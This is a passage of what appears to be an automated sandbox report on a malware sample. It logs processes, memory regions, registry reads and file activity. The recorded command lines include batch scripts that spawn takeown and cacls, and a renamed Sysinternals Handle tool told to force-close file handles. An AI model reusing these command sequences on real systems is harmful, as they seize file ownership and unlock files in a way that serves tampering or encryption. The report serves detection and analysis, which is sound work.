| Write | STD_OUTPUT_HANDLE | size = 49 |
|
1 |
Registry (7)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Sysinternals\Handle | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Sysinternals | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Sysinternals | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Sysinternals\Handle | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Sysinternals | value_name = EulaAccepted, data = 0 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Sysinternals\Handle | value_name = EulaAccepted, data = 1 |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Sysinternals\Handle | value_name = EulaAccepted, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 |
Module (37)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x7ffaf70d0000 |
|
2 | |
| Get Filename | - | process_name = c:\users\ciihmn~1\appdata\local\temp\vidhs3md64.exe, file_name_orig = C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | address_out = 0x7ffaf70f02a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x7ffaf70f23f0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x7ffaf70e63c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x7ffaf70ed920 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x7ffaf70f5620 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventExW, address_out = 0x7ffaf70f5580 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x7ffaf70f55e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7ffaf70f0e10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7ffaf70ef110 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x7ffaf7a4cb10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x7ffaf7a55790 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x7ffaf7a4ea10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x7ffaf70f28c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolWait, address_out = 0x7ffaf7a4c470 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x7ffaf7a55410 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x7ffaf7aa42f0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x7ffaf7a895e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x7ffaf7aa3130 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7ffaf70f0fb0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x7ffaf7112720 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x7ffaf4f0e7a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7ffaf71128e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CompareStringEx, address_out = 0x7ffaf70e6010 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetDateFormatEx, address_out = 0x7ffaf7112a00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7ffaf70f0310 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTimeFormatEx, address_out = 0x7ffaf7112bc0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7ffaf70f25d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsValidLocaleName, address_out = 0x7ffaf7112cd0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LCMapStringEx, address_out = 0x7ffaf70e6000 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentPackageId, address_out = 0x7ffaf4ea45e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTickCount64, address_out = 0x7ffaf70e65a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsWow64Process, address_out = 0x7ffaf70ee960 |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #152: cmd.exe
0
0
| Information | Value |
|---|---|
| ID | #152 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\cKJ5Qstc.bat" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:04:58, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:03 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xce0 |
| Parent PID | 0x318 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs | - |
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x0000003dfe610000 | 0x3dfe610000 | 0x3dfe62ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000003dfe630000 | 0x3dfe630000 | 0x3dfe643fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000003dfe650000 | 0x3dfe650000 | 0x3dfe74ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000003dfe750000 | 0x3dfe750000 | 0x3dfe753fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000003dfe760000 | 0x3dfe760000 | 0x3dfe760fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000003dfe770000 | 0x3dfe770000 | 0x3dfe771fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ffd30000 | 0x7df5ffd30000 | 0x7ff5ffd2ffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x00007ff677510000 | 0x7ff677510000 | 0x7ff677532fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff677537000 | 0x7ff677537000 | 0x7ff677537fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff67753e000 | 0x7ff67753e000 | 0x7ff67753ffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x7ff677ed0000 | 0x7ff677f28fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
Process #153: cmd.exe
135
0
| Information | Value |
|---|---|
| ID | #153 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat" "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:58, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xcf0 |
| Parent PID | 0xbd0 (c:\users\ciihmnxmn6ps\desktop\current_dirnwovkcyl.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
CF4
0x
EC8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000d60000 | 0x00d60000 | 0x00d7ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000d60000 | 0x00d60000 | 0x00d6ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000d70000 | 0x00d70000 | 0x00d73fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d80000 | 0x00d80000 | 0x00d81fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d80000 | 0x00d80000 | 0x00d83fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000d90000 | 0x00d90000 | 0x00da3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000db0000 | 0x00db0000 | 0x00deffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000df0000 | 0x00df0000 | 0x00eeffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000ef0000 | 0x00ef0000 | 0x00ef3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000f00000 | 0x00f00000 | 0x00f00fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000f10000 | 0x00f10000 | 0x00f11fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f20000 | 0x00f20000 | 0x00f2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f30000 | 0x00f30000 | 0x0112ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00f30000 | 0x00fedfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000ff0000 | 0x00ff0000 | 0x0102ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001030000 | 0x01030000 | 0x0112ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001130000 | 0x01130000 | 0x0122ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001230000 | 0x01230000 | 0x0135ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001230000 | 0x01230000 | 0x0123ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001350000 | 0x01350000 | 0x0135ffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x013d0000 | 0x0141ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001420000 | 0x01420000 | 0x0541ffff | Pagefile Backed Memory | - |
|
|
|
- |
| sortdefault.nls | 0x05420000 | 0x05756fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x74540000 | 0x74547fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e980000 | 0x7e980000 | 0x7ea7ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ea80000 | 0x7ea80000 | 0x7eaa2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007eaa8000 | 0x7eaa8000 | 0x7eaaafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eaab000 | 0x7eaab000 | 0x7eaadfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eaae000 | 0x7eaae000 | 0x7eaaefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eaaf000 | 0x7eaaf000 | 0x7eaaffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (75)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
10 | |
| Get Info | - | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
35 | |
| Open | STD_INPUT_HANDLE | - |
|
3 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
4 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 83 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 62 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 200, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0xf14, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0xed0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x13d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75172780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7514fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74e435c0 |
|
1 |
Environment (31)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
8 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
5 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
6 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
2 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
2 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #155: vidhs3md.exe
175
0
| Information | Value |
|---|---|
| ID | #155 |
| File Name | c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe |
| Command Line | vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:59, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe54 |
| Parent PID | 0x974 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
CE8
0x
850
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x0003ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x002d0000 | 0x002f9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x002e0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000330000 | 0x00330000 | 0x0033ffff | Private Memory | rw |
|
|
|
- |
| vidhs3md.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0069ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005a0000 | 0x005a0000 | 0x0069ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000006a0000 | 0x006a0000 | 0x00827fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000830000 | 0x00830000 | 0x009b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009c0000 | 0x009c0000 | 0x01dbffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001dc0000 | 0x01dc0000 | 0x01f3ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74550000 | 0x745e1fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x74730000 | 0x74737fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x74ad0000 | 0x74c0ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74c10000 | 0x74c53fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x74ce0000 | 0x74d23fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x74eb0000 | 0x74f6dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74f70000 | 0x75129fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75220000 | 0x7524afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x752b0000 | 0x752bbfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x752c0000 | 0x7667efff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76800000 | 0x76cdcfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76da0000 | 0x76ebffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x77100000 | 0x7710efff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x771d0000 | 0x7725cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77370000 | 0x774bcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffaf7a0ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75130000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x74c60000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x74eb0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77370000 |
|
1 | |
| Load | USER32.dll | base_address = 0x74ad0000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x74730000 |
|
